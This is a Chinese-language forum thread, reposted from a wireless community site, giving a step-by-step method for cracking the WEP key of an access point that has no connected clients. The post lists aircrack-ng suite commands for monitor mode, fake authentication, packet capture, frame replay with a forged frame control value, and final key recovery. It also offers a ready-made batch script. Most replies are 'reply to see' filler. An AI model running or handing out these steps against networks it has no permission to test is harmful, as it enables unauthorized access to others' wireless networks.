完全无客户端 wep 破解方法
<p>试验环境</p><p>ap:d-link 724 (没有任何有线和无线连接)</p><p>os:windows</p><p>网卡:atheros 驱动版本为commview 4.2.2.104</p><p>下面的操作在windows下linux下原理相同</p><p>第一步 (打开监视模式)</p><p>airserv-ng -c 1 -d "commview.dll|debug"</p><p>-c 1 (监视通道1)</p><p><br/></p><p>第二步 (使用 fake authentication 攻击方式)</p><p>aireplay-ng -1 0 -e <ap essid> -a <ap bssid> -h <网卡mac> 127.0.0.1:666</p><p></p><p>第三步 (捕捉包)</p><p>airodump-ng -c 1 -w cap 127.0.0.1:666</p><p>第四步 (使用 interactive frame selection)这一步是关键</p><p>aireplayer-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -h <网卡mac> -b <ap bssid> 127.0.0.1:666</p><p>解释 -p 0841 即将frame control 设置为 0841</p><p>运行这个命令后屏幕显示读包我测试的时候一般要读1-3万个包多个包(这个过程较长)</p><p></p><p>读到了一定数量后就会有下面的画面显示</p><p></p><p><font color="#ff0000">一定要放弃第一个包(我测试的时候基本上放弃3个包以上)不然这个进程会死掉无法继续了<br/>注意这张解图 BSSID=00:0F:3D:32:BD:5D(ap mac) 并且 Source MAC=00:0F:3D:32:BD:5D(ap mac)</font></p><p><font color="#ff0000">测试几次都是一样的!!</font></p><p><font color="#000000">然后开始发包了</font></p><p></p><p>可以看到 airodump-ng窗口的数据在增长</p><p><br/></p><p>最后使用aircrack-ng破解了</p><p>aircrack-ng cap-01.cap</p><p>----------------------</p><p>后记:这篇文章写得较为粗糙可能有些网友看不太明白较为基础的可以参看我的</p><p><a href="http://www.anywlan.com/dispbbs.asp?BoardID=15&ID=7225&replyID=&skin=1">http://www.anywlan.com/dispbbs.asp?BoardID=15&ID=7225&replyID=&skin=1</a></p><p>有时间我会将该片文章的windows批处理文件写好的!</p>回复看下文 <p>我在airdump-ng的窗口中注意了一下这个D-LINK AP 在没有任何客户端的情况下也不是完全没有数据(DATA)</p><p>只是很少而已大约半小时就10来个,并且这些数据从原地址和目标地址上来判断好像是自己发给自己的。</p><p>如果你的ap完全没有数据我想这种方法也没有效果!!</p><p></p> <p>批处理文件改好了需要的自行下载,解开后使用。</p><p>使用方法 air0841 <通道号> <ap essid> <ap bssid></p><p>
</p>**** Hidden Message ***** <P>批处理文件修改完毕,需要者回复后可下载</P>
<P>使用方法 air0841< 通道号> <ap essid> <ap bssid></P>
<P>希望大家共同讨论</P>
<P></P> <p>呵呵,那就老老实实的回复一次吧!</p> <p>回复一次吧!<br/></p> 回复看下文。 <p>回复一次吧!<br/>转自中国无线门户,原文地址:http://www.anywlan.com/dispbbs.asp?boardID=15&ID=7982&page=1</p><p></p> <p>回复可见</p> <p>回复可见<br/>转自中国无线门户,原文地址:http://www.anywlan.com/dispbbs.asp?boardID=15&ID=7982&page=1</p><p></p> <p>多谢提供支持</p><p></p> kankanknaknakn